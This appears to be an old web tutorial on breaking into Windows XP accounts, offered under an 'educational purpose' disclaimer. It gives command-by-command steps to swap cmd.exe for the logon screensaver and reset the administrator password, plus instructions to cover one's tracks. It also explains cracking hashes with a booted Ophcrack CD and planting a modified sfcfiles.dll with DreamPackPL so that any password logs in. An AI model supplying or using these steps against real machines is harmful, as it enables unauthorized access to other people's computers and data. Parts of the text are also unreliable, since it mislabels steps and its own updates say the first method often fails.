How to Hack or Crack a Windows XP Administrator
Password
This is provided only for
educational purpose it is a simple way to Recover, Hack or Crack the Window XP
Administrator Password. There are different Methods that I have outlined below.
Windows
XP Privilege Escalation Exploit
(Before you continue Read the
Updates at the bottom)
Here are the steps involved to Hack
the Window XP Administrator Password .
- Go to Start –> Run –> Type in CMD
- You will get a command prompt. Enter these commands the
way it is given
- cd\
- cd\ windows\system32
- mkdir temphack
- copy logon.scr temphack\logon.scr
- copy cmd.exe temphack\cmd.exe
- del logon.scr
- rename cmd.exe logon.scr
- exit
Wait its not over read the rest to
find out how to Hack the Window XP Administrator Password
A Brief explanation of what you are currently doing here is
Your are nagivating to the windows
system Directory where the system files are stored. Next your creating a
temporary directory called mkdir. After which you are copying or backing
up the logon.scr and cmd.exe files into the mkdir then you
are deleting the logon.scr file and renaming cmd.exe file to logon.scr.
So basically you are telling windows
is to backup the command program and the screen saver file. Then we edited the
settings so when windows loads the screen saver, we will get an unprotected
dos prompt without logging in. When this appears enter this command
net user password
Example: If the admin user name is
clazh and you want change the password to pass Then type in the following
command
net user clazh pass
This will chang the admin password
to pass.
Thats it you have sucessfully hacked the Window XP Administrator
Password now you can Log in, using the hacked Window XP
Administrator Password and do whatever you want to do.
Here are the steps involved to De Hack
or restore the Window XP Administrator Password to cover your tracks.
- Go to Start –> Run –> Type in CMD
- You will get a command prompt. Enter these commands the
way it is given
- cd\
- cd\ windows\system32\temphack
- copy logon.scr C:\windows\system32\logon.scr
- copy cmd.exe C:\windows\system32\cmd.exe
- exit
Or simply go to
C:\windows\system32\temphack and copy the contents of temphack back into
system32 directory click Yes to overwrite the modified files.
Note To administrators: You can
block the entire password change thing just a little tweak in the local
security policy (control panel->administrative tools,works only for
administrators group) will disallow any change in password even if u r the
Admin (u can put a number of other restrictions too), but be cautious to give
other users limitted accounts. After you have done this, the above Screensaver
technique will fail.
Update: Christian Mohn points out
The Above method is is possible only if you have Local Administrator
Privileges. My fault for not checking it up before posting.
Update: The above Method only works if the system is FAT/FAT32 –
because of the updated "user rights management” in NTFS – file level rights
etc. This does not work on a system using NTFS.
Hack
or Crack a Windows XP Administrator Password using OphCrack
Ophcrack is a Windows password
cracker based on rainbow tables. It is a very efficient implementation of
rainbow tables done by the inventors of the method. It comes with a GTK+
Graphical User Interface and runs on Windows, Mac OS X (Intel CPU) as well as
on Linux.
Go to Ophcrack and download the live CD burn it to
a disk and boot with it. It will depend on how strong the password is.
Recover
the Password using DreamPackPL
Thanks for the steps from Giftson
Steps to Hack into a Windows XP
Computer without changing password:
- Get physical access to the machine. Remember that it
must have a CD or DVD drive.
- Download DreamPackPL
http://www.d–b.webpark.pl/dreampackpl_en.htm
- Unzip the downloaded dreampackpl_iso.zip and you’ll get
dreampackpl.ISO.
- Use any burning program that can burn ISO images.
- After you have the disk, boot from the CD or DVD drive.
You will see Windows 2000 Setup and it will load some files.
- Press "R” to install DreamPackPL.
- Press "C” to install DreamPackPL by using the recovery
console.
- Select the Windows installation that is currently on
the computer (Normally is "1? if you only have one Windows installed)
- Backup your original sfcfiles.dll by typing: "ren
C:\Windows\System32\sfcfiles.dll sfcfiles.lld” (without quotes)
- Copy the hacked file from CD to system32 folder. Type:
"copy D:\i386\pinball.ex_ C:\Windows\System32\sfcfiles.dll” (without
quotes and assuming your CD drive is D:)
- Type "exit”, take out disk and reboot.
- In the password field, type "dreamon” (without quotes)
and DreamPack menu will appear.
- Click the top graphic on the DreamPack menu and you
will get a menu popup.
- Go to commands and enable the options and enable the
god command.
- Type "god” in the password field to get in Windows.
You can also go to Passwords and
select "Logon with wrong password and hash”. This option allows you to login
with ANY password.
Note: If you are running any kind of
Anti-Virus Tool it will give you a prompt saying that it is a Virus since they
have already labelled this tool as a Hack-Tool. A Hack-Tool is NOT a virus. The
DreamPackPL helps you bypass the Windows Login screen and it is not
destructive.
Recover
All Windows Password including Vista with Login Recovery
Login Recovery is a Online service
that can help you to recover your Windows Password including Windows Vista.
There are three steps Involved
- Download the Login Recovery Software extraction program to create a bootable floppy disk to
read the password file.
(click here for a CD version) - Insert the disk into the
computer you wish to recover passwords from and boot the computer to
extract the encrypted passwords to the disk.
- Put the disk into an Internet
enabled computer, and upload the encrypted password file for decryption.
(see uploads
page)
This is a Paid service but
Alternativly they Provide a free service which is available by waiting upto 48
hours (Only One free request every three months so be careful how you use it).